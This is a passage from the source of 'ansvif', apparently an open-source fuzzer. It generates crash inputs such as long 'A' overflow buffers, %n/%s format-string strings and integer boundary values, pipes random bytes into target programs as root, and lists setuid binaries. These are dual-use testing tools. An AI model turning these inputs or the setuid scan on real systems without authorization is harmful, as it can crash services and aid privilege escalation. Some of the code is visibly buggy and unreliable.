\___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <cstdlib> 13 | #include <cstring> 14 | #include <fstream> 15 | #include <iomanip> 16 | #include <iostream> 17 | #include <sstream> 18 | #include <stdio.h> 19 | #include <string> 20 | #include <thread> 21 | #include <unistd.h> 22 | #include <vector> 23 | 24 | int rand_me_plz(int rand_from, int rand_to); 25 | 26 | char fortune_cookie() { 27 | /* because fortune cookies taste good */ 28 | char chr; 29 | /* all the characters that make up hex */ 30 | const char *hex_digits = "0123456789ABCDEF"; 31 | int i; 32 | for (i = 0; i < 1; i++) { 33 | /* now we just get two random hex characters and 34 | * return them to the routine 35 | */ 36 | chr = hex_digits[(rand_me_plz(0, 255))]; 37 | } 38 | return (chr); 39 | } 40 | 41 | std::string trash_generator(int trash, int buf, std::string user_junk, 42 | std::string opt_other_str, bool never_rand) { 43 | /* this is the trash generator, here we generate 44 | * bad input, some of it random, some of it precrafted 45 | * and some of it user supplied to try to crash the 46 | * program at hand 47 | */ 48 | std::string junk = ""; 49 | std::string hex_stuff; 50 | int trash_num; 51 | 52 | switch(trash) { 53 | case 0x00 : 54 | { 55 | for (trash_num = 0; trash_num < buf; trash_num++) { 56 | junk = "A" + junk; 57 | } 58 | break; 59 | } 60 | case 0x01 : 61 | { 62 | junk = "-1"; 63 | break; 64 | } 65 | case 0x02 : 66 | { 67 | junk = "1"; 68 | break; 69 | } 70 | case 0x03 : 71 | { 72 | junk = "0"; 73 | break; 74 | } 75 | case 0x040 : 76 | { 77 | junk = "2"; 78 | break; 79 | } 80 | case 0x05 : 81 | { 82 | std::stringstream hex_null_ss; 83 | hex_null_ss << 0x00; 84 | junk = hex_null_ss.str(); 85 | break; 86 | } 87 | case 0x06 : 88 | { 89 | for (trash_num = 0; trash_num < buf / 2; trash_num++) { 90 | junk = "\%s" + junk; 91 | } 92 | break; 93 | } 94 | case 0x07 : 95 | { 96 | for (trash_num = 0; trash_num < buf / 2; trash_num++) { 97 | junk = "\%n" + junk; 98 | } 99 | break; 100 | } 101 | case 0x08 : 102 | { 103 | if (never_rand == false) { 104 | for (trash_num = 0; trash_num < buf; trash_num++) { 105 | junk = junk += fortune_cookie(); 106 | } 107 | } 108 | break; 109 | } 110 | case 0x09 : 111 | { 112 | for (trash_num = 0; trash_num < buf; trash_num++) { 113 | junk = "A" + junk; 114 | } 115 | junk = user_junk + junk; 116 | if (buf - user_junk.length() < junk.size()) 117 | junk = junk.substr(0, buf); 118 | else { 119 | return ("OOR"); 120 | } 121 | break; 122 | } 123 | case 0x0A : 124 | { 125 | for (trash_num = 0; trash_num < buf / 2; trash_num++) { 126 | junk = "\%s" + junk; 127 | } 128 | junk = user_junk + junk; 129 | if (buf - user_junk.length() < junk.size()) 130 | junk = junk.substr(0, buf); 131 | else 132 | return ("OOR"); 133 | break; 134 | } 135 | case 0x0B : 136 | { 137 | if (never_rand == false) { 138 | for (trash_num = 0; trash_num < buf; trash_num++) { 139 | junk = junk += fortune_cookie(); 140 | } 141 | junk = user_junk + junk; 142 | if (buf - user_junk.length() < junk.size()) 143 | junk = junk.substr(0, buf); 144 | else 145 | return ("OOR"); 146 | } 147 | break; 148 | } 149 | case 0x0C : 150 | { 151 | for (trash_num = 0; trash_num < buf; trash_num++) { 152 | junk = "A" + junk; 153 | } 154 | junk = junk + user_junk; 155 | if (buf - user_junk.length() < junk.size()) 156 | junk = junk.substr(junk.length() - buf); 157 | else 158 | return ("OOR"); 159 | break; 160 | } 161 | case 0x0D : 162 | { 163 | for (trash_num = 0; trash_num < buf / 2; trash_num++) { 164 | junk = "\%s" + junk; 165 | } 166 | junk = junk + user_junk; 167 | if (buf - user_junk.length() < junk.size()) 168 | junk = junk.substr(junk.length() - buf); 169 | else 170 | return ("OOR"); 171 | break; 172 | } 173 | case 0x0E : 174 | { 175 | if (never_rand == false) { 176 | for (trash_num = 0; trash_num < buf; trash_num++) { 177 | junk = junk += fortune_cookie(); 178 | } 179 | junk = junk + user_junk; 180 | if (buf - user_junk.length() < junk.size()) 181 | junk = junk.substr(junk.length() - buf); 182 | else 183 | return ("OOR"); 184 | } 185 | break; 186 | } 187 | case 0x0F : 188 | { 189 | for (trash_num = 0; trash_num < buf / 2; trash_num++) { 190 | junk = "\%n" + junk; 191 | } 192 | junk = junk + user_junk; 193 | if (buf - user_junk.length() < junk.size()) 194 | junk = junk.substr(junk.length() - buf); 195 | else 196 | return ("OOR"); 197 | break; 198 | } 199 | case 0x10 : 200 | { 201 | std::stringstream int_trash; 202 | int_trash << rand_me_plz(0, 9999); 203 | junk = int_trash.str(); 204 | break; 205 | } 206 | case 0x11 : 207 | { 208 | std::stringstream int_trash, float_trash; 209 | int_trash << rand_me_plz(0, 9999); 210 | float_trash << rand_me_plz(0, 9999); 211 | junk = int_trash.str() + "." + float_trash.str(); 212 | break; 213 | } 214 | case 0x12 : 215 | { 216 | junk = "\"\""; 217 | } 218 | break; 219 | case 0x13 : 220 | { 221 | junk = opt_other_str; 222 | break; 223 | } 224 | case 0x14 : 225 | { 226 | junk = "-32768"; 227 | break; 228 | } 229 | case 0x15 : 230 | { 231 | junk = "32767"; 232 | break; 233 | } 234 | case 0x16 : 235 | { 236 | junk = "-2147483648"; 237 | break; 238 | } 239 | case 0x17 : 240 | { 241 | junk = "2147483647"; 242 | break; 243 | } 244 | case 0x18 : 245 | { 246 | junk = "-9223372036854775808"; 247 | break; 248 | } 249 | case 0x19 : 250 | { 251 | junk = "9223372036854775807"; 252 | break; 253 | } 254 | case 0x1A : 255 | { 256 | junk = "65535"; 257 | break; 258 | } 259 | case 0x1B : 260 | { 261 | junk = "65536"; 262 | break; 263 | } 264 | case 0x1C : 265 | { 266 | junk = "4294967295"; 267 | break; 268 | } 269 | case 0x1D : 270 | { 271 | junk = "18446744073709551615"; 272 | break; 273 | } 274 | case 0x1E : 275 | { 276 | junk = "18446744073709551616"; 277 | break; 278 | } 279 | case 0x1F : 280 | { 281 | junk = "127"; 282 | break; 283 | } 284 | case 0x20 : 285 | { 286 | junk = "255"; 287 | break; 288 | } 289 | case 0x21 : 290 | { 291 | junk = "256"; 292 | break; 293 | } 294 | default : 295 | return ("OOR"); 296 | } 297 | 298 | /* return the junk to put in between the args */ 299 | return (junk); 300 | } 301 | 302 | std::string make_garbage(int trash, int buf, std::string opt_other_str, 303 | bool is_other, bool never_rand) { 304 | buf = buf - 1; 305 | std::string all_junk; 306 | if (is_other == true) { 307 | if (isatty(STDIN_FILENO)) { 308 | /* if it's a stdin then we'll call the tash generator */ 309 | std::string user_stuff = ""; 310 | all_junk = 311 | trash_generator(trash, buf, user_stuff, opt_other_str, never_rand); 312 | } else { 313 | std::string user_stuff; 314 | getline(std::cin, user_stuff); 315 | all_junk = 316 | trash_generator(trash, buf, user_stuff, opt_other_str, never_rand); 317 | } 318 | } else if (is_other == false) { 319 | if (isatty(STDIN_FILENO)) { 320 | std::string user_stuff = ""; 321 | all_junk = trash_generator(trash, buf, user_stuff, "", never_rand); 322 | } else { 323 | std::string user_stuff; 324 | getline(std::cin, user_stuff); 325 | all_junk = trash_generator(trash, buf, user_stuff, "", never_rand); 326 | } 327 | } 328 | /* return all the junk the trash generator made */ 329 | return ("'" + all_junk + "'"); 330 | } 331 | -------------------------------------------------------------------------------- /src/version.h: -------------------------------------------------------------------------------- 1 | #ifndef version_h 2 | #define version_h 3 | 4 | #include <string> 5 | /* what version of ansvif are we running? */ 6 | extern std::string ver; 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /src/win/printf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #include <stdio.h> 13 | #include <stdlib.h> 14 | #include <string.h> 15 | 16 | int main(int argc, char *argv[]) { 17 | int i; 18 | char tmp[3]; 19 | tmp[2] = '\0'; 20 | if (argc > 1) { 21 | for (i = 2; i < strlen(argv[1]); i += 4) { 22 | strncpy(tmp, argv[1] + i, 2); 23 | printf("%c", (char)strtol(tmp, NULL, 16)); 24 | } 25 | } else { 26 | printf("USAGE: printf.exe \\x41\\x42\n"); 27 | return 1; 28 | } 29 | return 0; 30 | } 31 | -------------------------------------------------------------------------------- /src/write_file.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ansvif 3 | * A Not So Very Intelligent Fuzzer 4 | * Marshall Whittaker / oxagast 5 | */ 6 | 7 | // __ _ _ __ ___ __ ____ ____ 8 | // / ( \/ )/ _\ / __)/ _\/ ___(_ _) 9 | // ( O ) (/ ( (_ / \___ \ )( 10 | // \__(_/\_\_/\_/\___\_/\_(____/(__) 11 | 12 | #ifdef __unix 13 | #include "version.h" 14 | #endif 15 | #ifdef _WIN32 16 | #include "version.h" 17 | #endif 18 | #include <cstdlib> 19 | #include <fstream> 20 | #include <iostream> 21 | #include <random> 22 | #include <regex> 23 | #include <signal.h> 24 | #include <stdio.h> 25 | #include <sys/stat.h> 26 | #include <thread> 27 | #include <unistd.h> 28 | #include <vector> 29 | 30 | #define READ 0 31 | #define WRITE 1 32 | 33 | std::string make_garbage(int trash, int buf, std::string opt_other_str, 34 | bool is_other, bool never_rand); 35 | std::string trash_generator(int trash, int buf, std::string user_junk, 36 | std::string opt_other_str, bool never_rand); 37 | int rand_me_plz(int rand_from, int rand_to); 38 | void help_me(std::string mr_me); 39 | 40 | void write_seg(std::string filename, std::string line) { 41 | /* this is just a simple file writing routine 42 | * used mostly for logging and writing the junk 43 | * files 44 | */ 45 | std::ofstream w_f; 46 | w_f.open(filename, std::ios::out | std::ios::app); 47 | w_f << line << std::endl; 48 | w_f.close(); 49 | } 50 | 51 | void write_junk_file(std::string filename, std::vector<std::string> opt_other, 52 | int buf_size, int rand_spec_one, int rand_spec_two, 53 | bool never_rand, std::string other_sep, bool verbose) { 54 | /* Cashhhhhhhhh me ousside howbow dat?? */ 55 | /* if there is an old file we should remove it first */ 56 | remove(filename.c_str()); 57 | /* initialize our junk and write oscar to the file */ 58 | std::string oscar; 59 | std::ofstream w_f; 60 | w_f.open(filename, std::ios::out | std::ios::app); 61 | for (int start_buf = 0; start_buf <= buf_size; start_buf++) { 62 | std::string oscar = opt_other.at(rand_me_plz(0, opt_other.size() - 1)); 63 | std::string trash = 64 | make_garbage(rand_me_plz(rand_spec_one, rand_spec_two), 65 | rand_me_plz(1, buf_size), "", false, never_rand); 66 | w_f << oscar; 67 | if (trash != "OOR") { 68 | w_f << trash; 69 | } 70 | int is_sep = rand_me_plz(0, 1); 71 | if (is_sep == 1) { 72 | w_f << other_sep << std::endl; 73 | } else { 74 | w_f << std::endl; 75 | } 76 | if (verbose == true) { 77 | std::cerr << oscar; 78 | { 79 | /* write the shit to terminal if we're in verbose mode */ 80 | if (trash != "OOR") 81 | std::cerr << trash; 82 | } 83 | if (is_sep == 1) { 84 | std::cerr << other_sep << std::endl; 85 | } else { 86 | std::cerr << std::endl; 87 | } 88 | } 89 | } 90 | /* make sure to close it out */ 91 | w_f.close(); 92 | } 93 | -------------------------------------------------------------------------------- /tmp/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/tmp/.gitkeep -------------------------------------------------------------------------------- /tools/bermise_fuzz.sh: -------------------------------------------------------------------------------- 1 | ## bermise_fuzz 2 | ## Part of the ansvif tool chain 3 | ## __ _ _ __ ___ __ ____ ____ 4 | ## / ( \/ )/ _\ / __)/ _\/ ___(_ _) 5 | ## ( O ) (/ ( (_ / \___ \ )( 6 | ## \__(_/\_\_/\_/\___\_/\_(____/(__) 7 | 8 | ## This should be run as root to operate 9 | ## correctly if using things like netcat 10 | ## because we have to read /var/log/syslog 11 | ## to detect service crashes. 12 | 13 | if [ $# -eq 0 ] 14 | then 15 | echo "ansvif toolchain -- A Not So Very Intelligent Fuzzer"; 16 | echo "Usage:"; 17 | echo " $0 iconv -f Unicode"; 18 | echo " $0 nc 127.0.0.1 22"; 19 | exit 0; 20 | fi; 21 | 22 | 23 | # You can comment this out if you know what 24 | # you're doing. 25 | if [ `whoami` != "root" ] 26 | then 27 | echo "Not root, exiting."; 28 | exit 0; 29 | fi; 30 | 31 | mupr="64"; 32 | 33 | syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c); 34 | binname="$1"; 35 | binshort=$(echo $binname | awk -F "/" '{print $NF}') 36 | echo fuzzing $binname; 37 | randchars=1; 38 | while [ $randchars -le 2 ] 39 | do 40 | kill_timer=`sleep 0.5; killall $binshort 2>/dev/null`; 41 | fuzz=`dd if=/dev/urandom bs=1 count=$mupr 2>/dev/null`; 42 | echo $fuzz > $binshort.tmp; 43 | echo $fuzz | $@; echo $?; 44 | mv $binshort.tmp $binshort.crash.bf; 45 | cat $binshort.out.bf; 46 | if [ `grep "traps:\|segfault" /var/log/syslog -c;` -gt $syslog_crashes ] 47 | then 48 | grep "traps:" /var/log/syslog | tail -n 1; 49 | break; 50 | fi; 51 | done; 52 | echo "Crash found!" 53 | echo "Crash buffer left in: $binshort.crash.bf"; 54 | echo "Crash output left in: $binshort.out.bf"; 55 | echo; 56 | echo "Crash data:"; 57 | od -x ./$binshort.crash.bf; 58 | -------------------------------------------------------------------------------- /tools/find_suid.sh: -------------------------------------------------------------------------------- 1 | ## find_suid 2 | ## Part of the ansvif tool chain 3 | ## __ _ _ __ ___ __ ____ ____ 4 | ## / ( \/ )/ _\ / __)/ _\/ ___(_ _) 5 | ## ( O ) (/ ( (_ / \___ \ )( 6 | ## \__(_/\_\_/\_/\___\_/\_(____/(__) 7 | 8 | if [ $# -eq 0 ] 9 | then 10 | echo "ansvif toolchain -- A Not So Very Intelligent Fuzzer"; 11 | echo "Usage:"; 12 | echo " $0 /bin /usr/bin"; 13 | exit 0; 14 | fi; 15 | find $@ -type f -perm /6000 2>/dev/null 16 | --------------------------------------------------------------------------------